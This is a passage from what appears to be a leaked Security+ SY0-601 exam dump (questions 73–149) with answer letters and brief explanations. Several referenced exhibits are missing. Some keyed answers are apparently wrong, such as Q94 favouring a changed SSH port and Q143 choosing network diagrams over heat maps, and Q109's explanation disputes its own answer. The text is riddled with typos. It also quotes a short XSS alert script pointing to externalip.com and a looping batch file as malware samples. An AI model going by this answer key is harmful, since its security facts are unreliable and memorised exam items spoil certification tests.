is essential for critical applications that cannot afford to be down.
Off-site backups ensure that data is safe and accessible even if the datacenter is damaged or
destroyed. This is important for all applications, but it is especially critical for mission-critical
applications.
QUESTION 73
A researcher has been analyzing large data sets for the last ten months. The researcher works
with colleagues from other institutions and typically connects via SSH to retrieve additional data.
Historically, this setup has worked without issue, but the researcher recently started getting the
following message:
Which of the following network attacks is the researcher MOST likely experiencing?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
30
A.
B.
C.
D.
MAC cloning
Evil twin
Man-in-the-middle
ARP poisoning
Answer: C
QUESTION 74
A network administrator has been alerted that web pages are experiencing long load times. After
determining it is not a routing or DNS issue, the administrator logs in to the router, runs a
command, and receives the following output:
Which of the following is the router experiencing?
A.
B.
C.
D.
DDoS attack
Memory leak
Buffer overflow
Resource exhaustion
Answer: D
Explanation:
The router is experiencing a resource exhaustion issue. The output from the command indicates
that the CPU is consistently busy, with a 1-second average of 99 percent busy and a 1-minute
average of 83 percent busy. This indicates that the router is struggling to keep up with the
demands placed on it, potentially due to a high volume of traffic or other factors. As a result, web
pages are experiencing long load times. This is an example of resource exhaustion, where the
router's resources are being overwhelmed and are unable to meet the demands placed on them.
A DDoS attack, memory leak, or buffer overflow would not typically cause the symptoms
described in the scenario.
QUESTION 75
A company provides mobile devices to its users to permit access to email and enterprise
applications. The company recently started allowing users to select from several different vendors
and device models. When configuring the MDM, which of the following is a key security
implication of this heterogeneous device approach?
A. The most common set of MDM configurations will become the effective set of enterprise mobile
security controls.
B. All devices will need to support SCEP-based enrollment; therefore, the heterogeneity of the
chosen architecture may unnecessarily expose private keys to adversaries.
C. Certain devices are inherently less secure than others, so compensatory controls will be needed
to address the delta between device vendors.
D. MDMs typically will not support heterogeneous deployment environments, so multiple MDMs will
need to be installed and configured.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
31
Answer: C
QUESTION 76
A pharmaceutical sales representative logs on to a laptop and connects to the public WiFi to
check emails and update reports. Which of the following would be BEST to prevent other devices
on the network from directly accessing the laptop? (Choose two.)
A.
B.
C.
D.
E.
F.
Trusted Platform Module
A host-based firewall
A DLP solution
Full disk encryption
A VPN
Antivirus software
Answer: BE
QUESTION 77
A company is implementing MFA for all applications that store sensitive data. The IT manager
wants MFA to be non-disruptive and user friendly. Which of the following technologies should the
IT manager use when implementing MFA?
A.
B.
C.
D.
One-time passwords
Email tokens
Push notifications
Hardware authentication
Answer: C
QUESTION 78
The CSIRT is reviewing the lessons learned from a recent incident. A worm was able to spread
unhindered throughout the network and infect a large number of computers and servers. Which of
the following recommendations would be BEST to mitigate the impacts of a similar incident in the
future?
A.
B.
C.
D.
Install a NIDS device at the boundary.
Segment the network with firewalls.
Update all antivirus signatures daily.
Implement application blacklisting.
Answer: B
QUESTION 79
A company is adopting a BYOD policy and is looking for a comprehensive solution to protect
company information on user devices. Which of the following solutions would BEST support the
policy?
A. Mobile device management
B. Full-device encryption
C. Remote wipe
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
32
D. Biometrics
Answer: A
QUESTION 80
A development team employs a practice of bringing all the code changes from multiple team
members into the same development project through automation. A tool is utilized to validate the
code and track source code through version control. Which of the following BEST describes this
process?
A.
B.
C.
D.
Continuous delivery
Continuous integration
Continuous validation
Continuous monitoring
Answer: B
QUESTION 81
A cybersecurity administrator needs to add disk redundancy for a critical server. The solution
must have a two-drive failure for better fault tolerance.
Which of the following RAID levels should the administrator select?
A.
B.
C.
D.
0
1
5
6
Answer: D
Explanation:
RAID 6: Because of parity, RAID 6 can withstand two disk failures at one time. This can be
simultaneous failures or during a rebuild another drive can fail and the system will still be
operational.
Source: https://www.promax.com/blog/how-many-drives-can-fail-in-a-raid-configuration
QUESTION 82
Which of the following BEST explains the reason why a server administrator would place a
document named password.txt on the desktop of an administrator account on a server?
A.
B.
C.
D.
The document is a honeyfile and is meant to attract the attention of a cyberintruder.
The document is a backup file if the system needs to be recovered.
The document is a standard file that the OS needs to verify the login credentials.
The document is a keylogger that stores all keystrokes should the account be compromised.
Answer: A
QUESTION 83
A security administrator has generated an SSH key pair to authenticate to a new server.
Which of the following should the security administrator do NEXT to use the keys securely for
authentication? Choose 2
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
33
A.
B.
C.
D.
E.
F.
Install the public key on the server.
Install the private key on the server.
Encrypt the public key.
Encrypt the private key.
Install both keys on the server.
Securely wipe the certificate signing request.
Answer: AD
Explanation:
The security administrator should install the public key on the server and encrypt the private key.
The public key should be installed on the server. This key will be used to verify the identity of the
client when they attempt to connect to the server. The private key should be kept secret and
stored on the local machine. This is the key that will be used to authenticate to the server.
Encrypting the private key will help to protect it from unauthorized access.
QUESTION 84
A company has just experienced a malware attack affecting a large number of desktop users.
The antivirus solution was not able to block the malware, but the HIDS alerted to C2 calls as
'Troj.Generic'. Once the security team found a solution to remove the malware, they were able to
remove the malware files successfully, and the HIDS stopped alerting. The next morning,
however, the HIDS once again started alerting on the same desktops, and the security team
discovered the files were back. Which of the following BEST describes the type of malware
infecting this company's network?
A.
B.
C.
D.
Trojan
Spyware
Rootkit
Botnet
Answer: A
QUESTION 85
An organization wants to host an externally accessible web server that will not contain sensitive
user information. Any sensitive information will be hosted on file servers. Which of the following is
the BEST architecture configuration for this organization?
A.
B.
C.
D.
Host the web server in a DMZ and the file servers behind a firewall
Host the web server and the file servers in a DMZ
Host the web server behind a firewall and the file servers in a DMZ
Host both the web server and file servers behind a firewall
Answer: A
QUESTION 86
Which of the following describes the ability of code to target a hypervisor from inside a guest OS?
A.
B.
C.
D.
Fog computing
VM escape
Software-defined networking
Image forgery
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
34
E. Container breakout
Answer: B
Explanation:
Virtual machine escape is an exploit in which the attacker runs code on a VM that allows an
operating system running within it to break out and interact directly with the hypervisor.
QUESTION 87
A company posts a sign indicating its server room is under video surveillance. Which of the
following control types is represented?
A.
B.
C.
D.
Administrative
Detective
Technical
Deterrent
Answer: D
QUESTION 88
A security administrator has received multiple calls from the help desk about customers who are
unable to access the organization's web server. Upon reviewing the log files. the security
administrator determines multiple open requests have been made from multiple IP addresses,
which is consuming system resources. Which of the following attack types does this BEST
describe?
A.
B.
C.
D.
DDoS
DoS
Zero day
Logic bomb
Answer: A
QUESTION 89
A network administrator was provided the following output from a vulnerability scan:
The network administrator has been instructed to prioritize remediation efforts based on overall
risk to the enterprise. Which of the following plugin IDs should be remediated FIRST?
A.
B.
C.
D.
E.
10
11
12
13
14
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
35
Answer: D
QUESTION 90
A junior systems administrator noticed that one of two hard drives in a server room had a red
error notification. The administrator removed the hard drive to replace it but was unaware that the
server was configured in an array. Which of the following configurations would ensure no data is
lost?
A.
B.
C.
D.
RAID 0
RAID 1
RAID 2
RAID 3
Answer: B
QUESTION 91
A system in the network is used to store proprietary secrets and needs the highest level of
security possible. Which of the following should a security administrator implement to ensure the
system cannot be reached from the Internet?
A.
B.
C.
D.
VLAN
Air gap
NAT
Firewall
Answer: B
Explanation:
An air gap, air wall or air gapping is a network security measure employed on one or more
computers to ensure that a secure computer network is physically isolated from unsecured
networks, such as the public Internet or an unsecured local area network. It means a computer or
network has no network interfaces connected to other networks, with a physical or conceptual air
gap, analogous to the air gap used in plumbing to maintain water quality.
QUESTION 92
Which of the following is the BEST use of a WAF?
A.
B.
C.
D.
To protect sites on web servers that are publicly accessible
To allow access to web services of internal users of the organization.
To maintain connection status of all HTTP requests
To deny access to all websites with certain contents
Answer: A
QUESTION 93
A transitive trust:
A. is automatically established between a parent and a child.
B. is used to update DNS records.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
36
C. allows access to untrusted domains.
D. can be used in place of a hardware token for logins.
Answer: A
QUESTION 94
A systems administrator wants to disable the use of usernames and passwords for SSH
authentication and enforce key-based authentication. Which of the following should the
administrator do NEXT to enforce this new configuration?
A. Issue a public/private key pair for each user and securely distribute a private key to each
employee.
B. Instruct users on how to create a public/private key pair and install users' public keys on the
server.
C. Disable the username and password authentication and enable TOTP in the sshd.conf file.
D. Change the default SSH port. enable TCP tunneling. and provide a pre-configured SSH client.
Answer: D
QUESTION 95
Which of the following would MOST likely be a result of improperly configured user accounts?
A.
B.
C.
D.
Resource exhaustion
Buffer overflow
Session hijacking
Privilege escalation
Answer: D
QUESTION 96
An organization is concerned about video emissions from users' desktops. Which of the following
is the BEST solution to implement?
A.
B.
C.
D.
Screen filters
Shielded cables
Spectrum analyzers
Infrared detection
Answer: A
QUESTION 97
A security administrator receives alerts from the perimeter UTM. Upon checking the logs, the
administrator finds the following output:
Time: 12/25 0300
From Zone: Untrust
To Zone: DMZ
Attacker: externalip.com
Victim: 172.16.0.20
To Port: 80
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
37
Action: Alert
Severity: Critical
When examining the PCAP associated with the event, the security administrator finds the
following information:
<script> alert ("Click here for important information regarding your
account! http://externalip.com/account.php"); </script>
Which of the following actions should the security administrator take?
A. Upload the PCAP to the IDS in order to generate a blocking signature to block the traffic.
B. Manually copy the <script> data from the PCAP file and generate a blocking signature in the
HIDS to block the traffic for future events.
C. Implement a host-based firewall rule to block future events of this type from occurring.
D. Submit a change request to modify the XSS vulnerability signature to TCP reset on future
attempts.
Answer: C
Explanation:
The PCAP file shows that the attacker is attempting to exploit a Cross-Site Scripting (XSS)
vulnerability on the victim machine. XSS is a type of vulnerability that allows an attacker to inject
malicious code into a web application. This malicious code can then be executed by the victim
when they visit the web application.
In this case, the attacker is attempting to inject the following malicious code into the web
application:
<script> alert ("Click here for important information regarding your account!
http://externalip.com/account.php"); </script>
This code will create a pop-up window that prompts the victim to click on a link. When the victim
clicks on the link, they will be redirected to the attacker's website. The attacker can then use this
website to steal the victim's personal information or to install malware on the victim's machine.
To prevent future attacks of this type, the security administrator should implement a host-based
firewall rule to block traffic from the attacker's IP address. This will prevent the attacker from
being able to communicate with the victim machine.
QUESTION 98
Which of the following encryption algorithms require one encryption key? (Choose two.)
A.
B.
C.
D.
E.
MD5
3DES
BCRYPT
RC4
DSA
Answer: BD
QUESTION 99
A company moved into a new building next to a sugar mill. Cracks have been discovered in the
walls of the server room, which is located on the same side as the sugar mill loading docks. The
cracks are believed to have been caused by heavy trucks. Moisture has begun to seep into the
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
38
server room, causing extreme humidification problems and equipment failure. Which of the
following BEST describes the type of threat the organization faces?
A.
B.
C.
D.
Foundational
Man-made
Environmental
Natural
Answer: A
QUESTION 100
Which of the following should a technician use to protect a cellular phone that is needed for an
investigation, to ensure the data will not be removed remotely?
A.
B.
C.
D.
Air gap
Secure cabinet
Faraday cage
Safe
Answer: C
QUESTION 101
Which of the following is the MOST likely motivation for a script kiddie threat actor?
A.
B.
C.
D.
Financial gain
Notoriety
Political expression
Corporate espionage
Answer: B
QUESTION 102
Moving laterally within a network once an initial exploit is used to gain persistent access for the
purpose of establishing further control of a system is known as:
A.
B.
C.
D.
pivoting.
persistence.
active reconnaissance.
a backdoor.
Answer: A
Explanation:
Pivoting is a technique used by attackers to move laterally within a network once they have
gained access to a single system. This allows them to access other systems on the network
without having to re-exploit the initial vulnerability.
QUESTION 103
An organization discovers that unauthorized applications have been installed on companyprovided mobile phones. The organization issues these devices, but some users have managed
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
39
to bypass the security controls. Which of the following is the MOST likely issue, and how can the
organization BEST prevent this from happening?
A. The mobile phones are being infected with malware that covertly installs the applications.
Implement full disk encryption and integrity-checking software.
B. Some advanced users are jailbreaking the OS and bypassing the controls.
Implement an MDM solution to control access to company resources.
C. The mobile phones have been compromised by an APT and can no longer be trusted. Scan the
devices for the unauthorized software, recall any compromised devices, and issue completely
new ones.
D. Some advanced users are upgrading the devices' OS and installing the applications.
The organization should create an AUP that prohibits this activity.
Answer: B
QUESTION 104
Which of the following is a valid multifactor authentication combination?
A.
B.
C.
D.
OTP token combined with password
Strong password and PIN combination
OTP token plus smart card
Presence detecting facial recognition
Answer: A
QUESTION 105
A security analyst is investigating a call from a user regarding one of the websites receiving a
503: Service Unavailable error. The analyst runs a netstat-an command to discover if
the web server is up and listening. The analyst receives the following output:
TCP
TCP
TCP
TCP
TCP
TCP
10.1.5.2:80
10.1.5.2:80
10.1.5.2:80
10.1.5.2:80
10.1.5.2:80
10.1.5.2:80
192.168.2.112:60973
192.168.2.112:60974
192.168.2.112:60975
192.168.2.112:60976
192.168.2.112:60977
192.168.2.112:60978
TIME_WAIT
TIME_WAIT
TIME_WAIT
TIME_WAIT
TIME_WAIT
TIME_WAIT
Which of the following types of attack is the analyst seeing?
A.
B.
C.
D.
Buffer overflow
Domain hijacking
Denial of service
ARP poisoning
Answer: C
QUESTION 106
Which of the following serves to warn users against downloading and installing pirated software
on company devices?
A. AUP
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
40
B. NDA
C. ISA
D. BPA
Answer: A
QUESTION 107
An employee opens a web browser and types a URL into the address bar. Instead of reaching the
requested site, the browser opens a completely different site. Which of the following types of
attacks have MOST likely occurred? (Choose two.)
A.
B.
C.
D.
E.
DNS hijacking
Cross-site scripting
Domain hijacking
Man-in-the-browser
Session hijacking
Answer: AD
QUESTION 108
A company is experiencing an increasing number of systems that are locking up on Windows
startup. The security analyst clones a machine, enters into safe mode, and discovers a file in the
startup process that runs Wstart.bat.
@echo off
:asdhbawdhbasdhbawdhb
start notepad.exe
start notepad.exe
start calculator.exe
start calculator.exe
goto asdhbawdhbasdhbawdhb
Given the file contents and the system’s issues, which of the following types of malware is
present?
A.
B.
C.
D.
Rootkit
Logic bomb
Worm
Virus
Answer: B
QUESTION 109
Which of the following attacks can be mitigated by proper data retention policies?
A.
B.
C.
D.
Dumpster diving
Man-in-the-browser
Spear phishing
Watering hole
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
41
Answer: A
Explanation:
Dumpster diving risks would be mitigated by proper data SANITATION policies...isn't data
RETNETION about how we keep data secure through backups, legal hold, etc.
QUESTION 110
A company employee recently retired, and there was a schedule delay because no one was
capable of filling the employee's position. Which of the following practices would BEST help to
prevent this situation in the future?
A.
B.
C.
D.
Mandatory vacation
Separation of duties
Job rotation
Exit interviews
Answer: C
QUESTION 111
During a security audit of a company's network, unsecure protocols were found to be in use.
A network administrator wants to ensure browser-based access to company switches is using the
most secure protocol. Which of the following protocols should be implemented?
A.
B.
C.
D.
SSH2
TLS1.2
SSL1.3
SNMPv3
Answer: B
QUESTION 112
A healthcare company is revamping its IT strategy in light of recent regulations. The company is
concerned about compliance and wants to use a pay-per-use model.
Which of the following is the BEST solution?
A.
B.
C.
D.
On-premises hosting
Community cloud
Hosted infrastructure
Public SaaS
Answer: D
Explanation:
“Pay per use” in this regard is like your electric Bill where you pay for how much of their services
you use.
You have to pay for Software as a Service and it must be public as well.
https://1c-dn.com/1c_enterprise/public/
QUESTION 113
Which of the following represents a multifactor authentication system?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
42
A.
B.
C.
D.
An iris scanner coupled with a palm print reader and fingerprint scanner with liveness detection
A secret passcode that prompts the user to enter a secret key if entered correctly
A digital certificate on a physical token that is unlocked with a secret passcode
A one-time password token combined with a proximity badge
Answer: C
QUESTION 114
A preventive control differs from a compensating control in that a preventive control is:
A.
B.
C.
D.
put in place to mitigate a weakness in a user control.
deployed to supplement an existing control that is EOL.
relied on to address gaps in the existing control structure.
designed to specifically mitigate a risk.
Answer: D
Explanation:
Preventative controls are designed to be implemented prior to a threat event and reduce and/or
avoid the likelihood and potential impact of a successful threat event. Examples of preventative
controls include policies, standards, processes, procedures, encryption, firewalls, and physical
barriers.
QUESTION 115
The exploitation of a buffer-overrun vulnerability in an application will MOST likely lead
to:
A.
B.
C.
D.
arbitrary code execution.
resource exhaustion.
exposure of authentication credentials.
dereferencing of memory pointers.
Answer: A
QUESTION 116
The president of a company that specializes in military contracts receives a request for an
interview. During the interview, the reporter seems more interested in discussing the president's
family life and personal history than the details of a recent company success. Which of the
following security concerns is this MOST likely an example of?
A.
B.
C.
D.
Insider threat
Social engineering
Passive reconnaissance
Phishing
Answer: B
QUESTION 117
Which of the following is an example of federated access management?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
43
A.
B.
C.
D.
Windows passing user credentials on a peer-to-peer network
Applying a new user account with a complex password
Implementing a AM framework for network access
Using a popular website login to provide access to another website
Answer: D
QUESTION 118
A company network is currently under attack. Although security controls are in place to stop the
attack, the security administrator needs more information about the types of attacks being used.
Which of the following network types would BEST help the administrator gather this information?
A.
B.
C.
D.
DMZ
Guest network
Ad hoc
Honeynet
Answer: D
QUESTION 119
An organization's policy requires users to create passwords with an uppercase letter, lowercase
letter, number, and symbol. This policy is enforced with technical controls, which also prevents
users from using any of their previous 12 passwords. The quantization does not use single signon, nor does it centralize storage of passwords.
The incident response team recently discovered that passwords for one system were
compromised. Passwords for a completely separate system have NOT been compromised, but
unusual login activity has been detected for that separate system. Account login has been
detected for users who are on vacation.
Which of the following BEST describes what is happening?
A. Some users are meeting password complexity requirements but not password length
requirements.
B. The password history enforcement is insufficient, and old passwords are still valid across many
different systems.
C. Some users are reusing passwords, and some of the compromised passwords are valid on
multiple systems.
D. The compromised password file has been brute-force hacked, and the complexity requirements
are not adequate to mitigate this risk.
Answer: C
QUESTION 120
A company recently implemented a new security system. In the course of configuration, the
security administrator adds the following entry:
#Whitelist
USB\VID13FE&PID_4127&REV_0100
Which of the following security technologies is MOST likely being configured?
A. Application whitelisting
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
44
B. HIDS
C. Data execution prevention
D. Removable media control
Answer: D
QUESTION 121
A security analyst needs to be proactive in understand the types of attacks that could potentially
target the company's execute.
Which of the following intelligence sources should to security analyst review?
A.
B.
C.
D.
Vulnerability feeds
Trusted automated exchange of indicator information
Structured threat information expression
Industry information-sharing and collaboration groups
Answer: D
QUESTION 122
A cybersecurity department purchased o new PAM solution. The team is planning to randomize
the service account credentials of the Windows server first.
Which of the following would be the BEST method to increase the security on the Linux server?
A.
B.
C.
D.
Randomize the shared credentials
Use only guest accounts to connect.
Use SSH keys and remove generic passwords
Remove all user accounts.
Answer: C
QUESTION 123
A security audit has revealed that a process control terminal is vulnerable to malicious users
installing and executing software on the system. The terminal is beyond end-of-life support and
cannot be upgraded, so it is placed on a projected network segment.
Which of the following would be MOST effective to implement to further mitigate the reported
vulnerability?
A.
B.
C.
D.
DNS sinkholding
DLP rules on the terminal
An IP blacklist
Application whitelisting
Answer: D
QUESTION 124
An organization has decided to host its web application and database in the cloud.
Which of the following BEST describes the security concerns for this decision?
A. Access to the organization's servers could be exposed to other cloud-provider clients
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
45
B. The cloud vendor is a new attack vector within the supply chain
C. Outsourcing the code development adds risk to the cloud provider
D. Vendor support will cease when the hosting platforms reach EOL.
Answer: B
QUESTION 125
A user reports constant lag and performance issues with the wireless network when working at a
local coffee shop.
A security analyst walks the user through an installation of Wireshark and get a five-minute pcap
to analyze. The analyst observes the following output:
Which of the following attacks does the analyst MOST likely see in this packet capture?
A.
B.
C.
D.
Session replay
Evil twin
Bluejacking
ARP poisoning
Answer: B
Explanation:
One of the main purposes of deauthentication used in the hacking community is to force clients to
connect to an evil twin access point which then can be used to capture network packets
transferred between the client and the access point.
https://en.wikipedia.org/wiki/Wi-Fi_deauthentication_attack
QUESTION 126
A user recently attended an exposition and received some digital promotional materials.
The user later noticed blue boxes popping up and disappearing on the computer, and reported
receiving several spam emails, which the user did not open.
Which of the following is MOST likely the cause of the reported issue?
A.
B.
C.
D.
There was a drive-by download of malware
The user installed a cryptominer
The OS was corrupted
There was malicious code on the USB drive
Answer: D
QUESTION 127
A security analyst is performing a packet capture on a series of SOAP HTTP requests for a
security assessment.
The analyst redirects the output to a file After the capture is complete, the analyst needs to review
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
46
the first transactions quickly and then search the entire series of requests for a particular string.
Which of the following would be BEST to use to accomplish the task? (Choose two.)
A.
B.
C.
D.
E.
F.
G.
head
tcpdump
grep
rail
curl
openssi
dd
Answer: AC
Explanation:
"Head" to display the first transactions.
"grep" to search for a specific string.
QUESTION 128
The Chief Executive Officer (CEO) of an organization would like staff members to have the
flexibility to work from home anytime during business hours, incident during a pandemic or crisis,
However, the CEO is concerned that some staff members may take advantage of the of the
flexibility and work from high-risk countries while on holidays work to a third-party organization in
another country. The Chief information Officer (CIO) believes the company can implement some
basic to mitigate the majority of the risk.
Which of the following would be BEST to mitigate CEO's concern? (Choose two.)
A.
B.
C.
D.
E.
F.
Geolocation
Time-of-day restrictions
Certificates
Tokens
Geotagging
Role-based access controls
Answer: AB
Explanation:
Geolocation reveals more specific data relating to their location, such as their current city or state.
Time of Day to prevents someone in a another time zone to perform outsourced work.
Geotagging labels your location for purpose of adding geographical details to a photo, a video, or
any media in the form of metadata.
QUESTION 129
A company is implementing a DLP solution on the file server. The file server has PII, financial
information, and health information stored on it. Depending on what type of data that is hosted on
the file server, the company wants different DLP rules assigned to the data. Which of the
following should the company do to help to accomplish this goal?
A.
B.
C.
D.
Classify the data
Mask the data
Assign the application owner
Perform a risk analysis
Answer: A
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
47
Explanation:
Data classification and typing schemas tag data assets so that they can be managed through the
information life cycle. A data classification schema is a decision tree for applying one or more
tags or labels to each data asset. Many data classification schemas are based on the degree of
confidentiality required:
Public (unclassified) - there are no restrictions on viewing the data. Public information presents no
risk to an organization if it is disclosed but does present a risk if it is modified or not available.
Confidential (secret)- the information is highly sensitive, for viewing only by approved persons
within the owner organization, and possibly by trusted third parties under NDA.
Critical (top secret)- the information is too valuable to allow any risk of its capture. Viewing is
severely restricted.
QUESTION 130
Which of the following allows for functional test data to be used in new systems for testing and
training purposes to protect the read data?
A.
B.
C.
D.
Data encryption
Data masking
Data deduplication
Data minimization
Answer: B
Explanation:
The main reason for applying masking to a data field is to protect data that is classified as
personally identifiable information, sensitive personal data, or commercially sensitive data.
However, the data must remain usable for the purposes of undertaking valid test cycles. It must
also look real and appear consistent. It is more common to have masking applied to data that is
represented outside of a corporate production system. In other words, where data is needed for
the purpose of application development, building program extensions and conducting various test
cycles.
https://en.wikipedia.org/wiki/Data_masking
QUESTION 131
A nuclear plant was the victim of a recent attack, and all the networks were air gapped. A
subsequent investigation revealed a worm as the source of the issue. Which of the following
BEST explains what happened?
A.
B.
C.
D.
A malicious USB was introduced by an unsuspecting employee.
The ICS firmware was outdated
A local machine has a RAT installed.
The HVAC was connected to the maintenance vendor.
Answer: A
QUESTION 132
Under GDPR, which of the following is MOST responsible for the protection of privacy and
website user rights?
A. The data protection officer
B. The data processor
C. The data owner
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
48
D. The data controller
Answer: D
Explanation:
In GDPR and other privacy laws, the data controller has the most responsibility when it comes to
protecting the privacy and rights of the data's subject, such as the user of a website.
QUESTION 133
A user recent an SMS on a mobile phone that asked for bank delays.
Which of the following social-engineering techniques was used in this case?
A.
B.
C.
D.
SPIM
Vishing
Spear phishing
Smishing
Answer: D
Explanation:
SPIM is unwanted messages sent over instant messaging (IM) channels, Vishing is VOIP, Spear
phishing is targeting a specific group or individual via email.
QUESTION 134
A security administrator needs to create a RAIS configuration that is focused on high read speeds
and fault tolerance. It is unlikely that multiple drivers will fail simultaneously. Which of the
following RAID configurations should the administration use?
A.
B.
C.
D.
RAID 0
RAID 1
RAID 5
RAID 10
Answer: C
Explanation:
https://techgenix.com/raid-10-vs-raid-5/
QUESTION 135
A user is concerned that a web application will not be able to handle unexpected or random input
without crashing.
Which of the following BEST describes the type of testing the user should perform?
A.
B.
C.
D.
Code signing
Fuzzing
Manual code review
Dynamic code analysis
Answer: B
QUESTION 136
A security administrator checks the table of a network switch, which shows the following output:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
49
Which of the following is happening to this switch?
A.
B.
C.
D.
MAC Flooding
DNS poisoning
MAC cloning
ARP poisoning
Answer: A
QUESTION 137
A company needs to centralize its logs to create a baseline and have visibility on its security
events. Which of the following technologies will accomplish this objective?
A.
B.
C.
D.
Security information and event management
A web application firewall
A vulnerability scanner
A next-generation firewall
Answer: A
QUESTION 138
The SOC is reviewing process and procedures after a recent incident. The review indicates it took
more than 30 minutes to determine that quarantining an infected host was the best course of
action. The allowed the malware to spread to additional hosts before it was contained.
Which of the following would be BEST to improve the incident response process?
A.
B.
C.
D.
Updating the playbooks with better decision points
Dividing the network into trusted and untrusted zones
Providing additional end-user training on acceptable use
Implementing manual quarantining of infected hosts
Answer: A
QUESTION 139
An organization has been experiencing outages during holiday sales and needs to ensure
availability of its point-of-sale systems.
The IT administrator has been asked to improve both server-data fault tolerance and site
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
50
availability under high consumer load.
Which of the following are the BEST options to accomplish this objective? (Select TWO)
A.
B.
C.
D.
E.
F.
Load balancing
Incremental backups
UPS
RAID
Dual power supply
NIC teaming
Answer: AD
QUESTION 140
In the middle of a cybersecurity, a security engineer removes the infected devices from the
network and lock down all compromised accounts. In which of the following incident response
phases is the security engineer currently operating?
A.
B.
C.
D.
E.
Identification
Preparation
Eradiction
Recovery
Containment
Answer: E
Explanation:
Isolation involves removing affected components from any environment the greater one. This can
be anything from removing the server from the network after become the target of DoS attacks, to
the point of placing applications in a VM sandbox outside the environment where the host usually
runs. Whatever the situation, you'll want to make sure you don't there is another Interface
between the affected component and the production network or the Internet.
QUESTION 141
An organization has a growing workforce that is mostly driven by additions to the sales
department. Each newly hired salesperson relies on a mobile device to conduct business. The
Chief Information Officer (CIO) is wondering it the organization may need to scale down just as
quickly as it scaled up. The ClO is also concerned about the organization's security and customer
privacy. Which of the following would be BEST to address the ClO's concerns?
A.
B.
C.
D.
Disallow new hires from using mobile devices for six months
Select four devices for the sales department to use in a CYOD model
Implement BYOD for the sates department while leveraging the MDM
Deploy mobile devices using the COPE methodology
Answer: C
QUESTION 142
A public relations team will be taking a group of guests on a tour through the facility of a large ecommerce company. The day before the tour, the company sends out an email to employees to
ensure all whiteboards are cleaned and all desks are cleared. The company is MOST likely trying
to protect against:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
51
A.
B.
C.
D.
Loss of proprietary information
Damage to the company's reputation
Social engineering
Credential exposure
Answer: A
Explanation:
In the context of information security, social engineering is the psychological manipulation of
people into performing actions or divulging confidential information think phishing, spoofing. That
is not being demonstrated in this question. The company is protecting themselves from loss of
proprietary information by clearing it all out. so that if anyone in the tour is looking to take it they
will be out of luck.
QUESTION 143
A network engineer needs to create a plan for upgrading the wireless infrastructure in a large
office Priority must be given to areas that are currently experiencing latency and connection
issues. Which of the following would be the BEST resource for determining the order of priority?
A.
B.
C.
D.
Nmapn
Heat maps
Network diagrams
Wireshark
Answer: C
QUESTION 144
A security analyst is preparing a threat for an upcoming internal penetration test. The analyst
needs to identify a method for determining the tactics, techniques, and procedures of a threat
against the organization's network. Which of the following will the analyst MOST likely use to
accomplish the objective?
A.
B.
C.
D.
A table exercise
NST CSF
MTRE ATT$CK
OWASP
Answer: C
QUESTION 145
A security analyst has received an alert about PII being sent via email. The analyst's Chief
Information Security Officer (CISO) has made it clear that PII must be handled with extreme care.
From which of the following did the alert MOST likely originate?
A.
B.
C.
D.
S/MIME
DLP
IMAP
HIDS
Answer: B
Explanation:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
52
Network-based DLP monitors outgoing data looking for sensitive data. Network-based DLP
systems monitor outgoing email to detect and block unauthorized data transfers and monitor data
stored in the cloud.
QUESTION 146
A document that appears to be malicious has been discovered in an email that was sent to a
company's Chief Financial Officer (CFO).
Which of the following would be BEST to allow a security analyst to gather information and
confirm it is a malicious document without executing any code it may contain?
A.
B.
C.
D.
Open the document on an air-gapped network
View the document's metadata for origin clues
Search for matching file hashes on malware websites
Detonate the document in an analysis sandbox
Answer: D
QUESTION 147
A network engineer notices the VPN concentrator overloaded and crashes on days when there
are a lot of remote workers. Senior management has placed greater importance on the availability
of VPN resources for the remote workers than the security of the end users' traffic.
Which of the following would be BEST to solve this issue?
A.
B.
C.
D.
iPSec
Always On
Split tunneling
L2TP
Answer: C
Explanation:
Some programs need VPN protection, while others can directly access the internet. Split
tunneling is an advanced VPN feature that lets you choose which programs and apps should
have a secure VPN tunnel and which could benefit from faster speeds and access to local
services. This feature reduces traffic overload on HQ servers and company data centers and
helps save costs for hardware.
QUESTION 148
A recent malware outbreak across a subnet included successful rootkit installations on many
PCs, ensuring persistence by rendering remediation efforts ineffective. Which of the following
would BEST detect the presence of a rootkit in the future?
A.
B.
C.
D.
FDE
NIDS
EDR
DLP
Answer: C
QUESTION 149
A security administrator currently spends a large amount of time on common security tasks, such
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
53
aa report generation, phishing investigations, and user provisioning and deprovisioning This
prevents the administrator from spending time on other security projects. The business does not
have the budget to add more staff members. Which of the following should the administrator
implement?
A.
B.
C.
D.
DAC
